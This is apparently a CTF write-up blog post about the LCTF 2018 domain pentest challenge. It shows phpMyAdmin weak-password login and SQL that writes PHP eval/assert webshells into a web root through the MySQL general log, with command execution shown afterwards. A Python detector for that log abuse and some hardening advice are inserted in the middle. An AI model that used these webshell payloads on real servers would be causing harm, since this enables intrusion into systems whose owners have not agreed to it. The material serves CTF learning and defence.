lctf2018-god of domain pentest


Challenge

Challenge description:
The Windows domain environment was hard to configure, so please go easy on it, masters, and don't wreck it.
Only 0-20 of the C-class range is used; there is no need to scan 21-255. Only common ports are open.
web.lctf.com has a domain user web.lctf.com\buguake, whose password is the local administrator password of 172.21.0.8.

188.131.161.90

Nmap scan first. Recent web pentest challenges like to hand out a SOCKS5 proxy, so look for one:

➜  ubuntu nmap -p 1000-1100 188.131.161.90

Starting Nmap 7.01 ( https://nmap.org ) at 2018-11-20 00:50 CST
Nmap scan report for 188.131.161.90
Host is up (0.048s latency).
Not shown: 97 closed ports
PORT     STATE SERVICE
1083/tcp open  ansoft-lm-1
1084/tcp open  ansoft-lm-2
1088/tcp open  cplscrambler-al
1089/tcp open  ff-annunc

Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds

Go through the proxy:

export all_proxy=socks5://188.131.161.90:1083

Visiting http://172.21.0.1 gives:

Hello World

Trying http://172.21.0.1/phpinfo.php shows the phpinfo page.

It is a phpStudy install, so try logging in to phpMyAdmin with weak passwords:

root / (blank)
root / phpmyadmin
root / root

Try to write a webshell from SQL:

select '<?php @eval($_POST[cmd]);?>' INTO OUTFILE 'c:/phpStudy/PHPTutorial/WWW/cmd.php';

Result:

#1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Switch approach: secure-file-priv only blocks INTO OUTFILE, so redirect the general log into the web root instead. Every query is then written to that file, including one that contains a PHP tag:

SET GLOBAL general_log = 'on';
SET GLOBAL general_log_file = 'C:/phpStudy/PHPTutorial/WWW/xyzz1.php';
SELECT '<?php assert($_GET["cmd"]);?>';

Webshell obtained.

Visit it:

http://172.21.0.8/xyzz1.php?cmd=system(%22whoami%22)

C:\phpStudy\PHPTutorial\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
364 Init DB    mysql
364 Query    SELECT 'pupiles-pc\administrator '
364 Query    SHOW TABLE STATUS FROM `mysql` LIKE 'general\_log%'
364 Query    SELECT COUNT(*) FROM `mysql`.`general_log`
364 Query    SHOW CREATE TABLE `mysql`.`general_log`
364 Quit

The page is simply the general log file rendered by PHP: the logged PHP tag has been executed, so the output of whoami appears in its place, and it shows that mysqld runs as the local administrator.
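The general log dump above is also exactly what a defender has to work with. As an added example (not code from this write-up), the Python below parses MySQL 5.5-style general-log lines and flags the two patterns used here: a log file redirected into a web root and a query carrying a PHP payload (the blocked INTO OUTFILE attempt is caught as well). It also audits the output of SHOW VARIABLES LIKE 'general_log%'. The sample log lines, session ids and benign queries are constructed for illustration.

```python
"""Detect general_log abuse of the kind shown in this write-up.

Added example, not code from the original post. It assumes MySQL 5.5-style
general-log text lines ("YYMMDD HH:MM:SS<tab>  Id Command<tab>Argument",
continuation lines without a timestamp) and a constructed sample log.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Script extensions that a web server would execute if the file landed in its root.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|jsp|jspx|asp|aspx)$", re.I)
# Directory names that commonly are (or contain) a document root.
WEBROOT_HINT = re.compile(r"[/\\](www|htdocs|wwwroot|inetpub|public_html|webapps)[/\\]", re.I)
# SET [GLOBAL] general_log_file = '<path>' (the slow log allows the same trick).
SET_LOGFILE = re.compile(
    r"set\s+(?:global\s+)?(general_log_file|slow_query_log_file)\s*=\s*['\"]([^'\"]+)['\"]", re.I)
# SELECT ... INTO OUTFILE/DUMPFILE '<path>'
OUTFILE = re.compile(r"into\s+(?:outfile|dumpfile)\s+['\"]([^'\"]+)['\"]", re.I)
# A PHP open tag or a code-execution function inside a query string.
PHP_PAYLOAD = re.compile(r"<\?(?:php|=)|\b(?:eval|assert|system|passthru|shell_exec|exec)\s*\(", re.I)
# One 5.5-style log line: optional timestamp, session id, command, tab, argument.
LOG_LINE = re.compile(r"^(?:(\d{6}\s+\d{1,2}:\d{2}:\d{2}))?\s*(\d+)\s+(Init DB|\w+)\t?(.*)$")


@dataclass
class Entry:
    session: str
    command: str
    argument: str


@dataclass
class Finding:
    session: str
    rule: str
    detail: str


def parse_general_log(text: str) -> List[Entry]:
    """Turn general-log text into entries; unmatched lines continue the previous statement."""
    entries: List[Entry] = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        m = LOG_LINE.match(raw)
        if m:
            entries.append(Entry(session=m.group(2), command=m.group(3), argument=m.group(4)))
        elif entries:
            entries[-1].argument += "\n" + raw
    return entries


def scan_general_log(text: str) -> List[Finding]:
    """Flag queries that redirect the log into a web root, write a file there, or carry PHP."""
    findings: List[Finding] = []
    for e in parse_general_log(text):
        if e.command.lower() != "query":
            continue
        m = SET_LOGFILE.search(e.argument)
        if m and (SCRIPT_EXT.search(m.group(2)) or WEBROOT_HINT.search(m.group(2))):
            findings.append(Finding(e.session, "log_file_redirect", m.group(2)))
        m = OUTFILE.search(e.argument)
        if m and (SCRIPT_EXT.search(m.group(1)) or WEBROOT_HINT.search(m.group(1))):
            findings.append(Finding(e.session, "outfile_to_webroot", m.group(1)))
        if PHP_PAYLOAD.search(e.argument):
            findings.append(Finding(e.session, "script_payload_in_query", e.argument.strip()[:80]))
    return findings


def audit_log_variables(variables: Dict[str, str]) -> List[str]:
    """Check SHOW VARIABLES LIKE 'general_log%' (as a dict) for a web-served log target."""
    problems: List[str] = []
    path = variables.get("general_log_file", "")
    if SCRIPT_EXT.search(path) or WEBROOT_HINT.search(path):
        problems.append(f"general_log_file points at a web-served path: {path}")
        if variables.get("general_log", "OFF").upper() == "ON":
            problems.append("general_log is ON, so every query is being written there")
    return problems


# Constructed sample: a benign session 12 and a session 364 replaying the write-up's queries.
SAMPLE_LOG = "\n".join([
    "181120 00:55:01\t   12 Connect\troot@localhost on ",
    "\t\t   12 Query\tSELECT COUNT(*) FROM `mysql`.`user`",
    "\t\t   12 Quit\t",
    "181120 00:56:10\t  364 Init DB\tmysql",
    "\t\t  364 Query\tselect '<?php @eval($_POST[cmd]);?>' INTO OUTFILE 'c:/phpStudy/PHPTutorial/WWW/cmd.php'",
    "\t\t  364 Query\tset global general_log='on'",
    "\t\t  364 Query\tSET global general_log_file='C:/phpStudy/PHPTutorial/WWW/xyzz1.php'",
    "\t\t  364 Query\tSELECT '<?php assert($_GET[\"cmd\"]);?>'",
    "\t\t  364 Quit\t",
])

if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG):
        print(f"session {f.session}: {f.rule} -> {f.detail}")
```

Two caveats follow from the write-up itself. The served copy of the log no longer contains the PHP tag (it was executed), so the scan has to run against the file on disk or against the previous log file, not against the web page. And because secure-file-priv did not stop this, the real controls are the ones the attack chain depended on: a non-default root password on phpMyAdmin, no SUPER privilege for the web application's MySQL account (SET GLOBAL requires it), and a mysqld service account that cannot write into the document root.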

Hmm, the site went down afterwards, so I gave up.
According to Nu1L's write-up, the next steps are MS17-010 and then MS14-068.
Nu1L's write-up: https://xz.aliyun.com/t/3341#toc-18


Author: xyzz
Link: http://www.xyzzpwn.top
Copyright: Unless otherwise stated, all articles on this blog are licensed under CC BY 4.0. Please credit xyzz when reposting.